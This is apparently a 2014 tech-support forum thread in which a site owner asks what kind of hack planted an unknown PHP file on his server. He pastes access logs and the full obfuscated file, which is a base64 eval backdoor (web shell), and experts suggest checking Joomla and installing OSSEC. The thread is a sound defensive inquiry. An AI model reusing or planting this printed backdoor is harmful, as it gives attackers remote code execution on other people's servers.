Solved

What kind of a hack is this?

Posted on 2014-12-23
5
242 Views
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs:
114.246.132.143 - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"

223.99.189.102 - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"


And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>

Open in new window


What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Thanks.
0
Comment
Question by:Daniel Wilson
  • 2
  • 2
5 Comments
 
LVL 58

Expert Comment

by:Gary
ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website or one of the plugins/vulnerabilities of WP et al
Otherwise you need to check the server logs for SSH/FTP brute force attacks
0
 
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
0
 
LVL 58

Accepted Solution

by:
Gary earned 500 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
0
 
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day.

91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

Open in new window

0
 
LVL 34

Expert Comment

by:gr8gonzo
ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:
http://hackertarget.com/defending-wordpress-ossec/

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:
http://www.ossec.net/
0

Featured Post

What is SQL Server and how does it work?

The purpose of this paper is to provide you background on SQL Server. It’s your self-study guide for learning fundamentals. It includes both the history of SQL and its technical basics. Concepts and definitions will form the solid foundation of your future DBA expertise.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Popup to change image and store url in database 2 30
PHP Undefined Index in HTML Form? 2 32
only allow numbers with preg match 4 26
WordPress syntax 2 26
Transferring data across the virtual world became simpler but protecting it is becoming a real security challenge.  How to approach cyber security  in today's business world!
Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…

910 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

21 Experts available now in Live!

Get 1:1 Help Now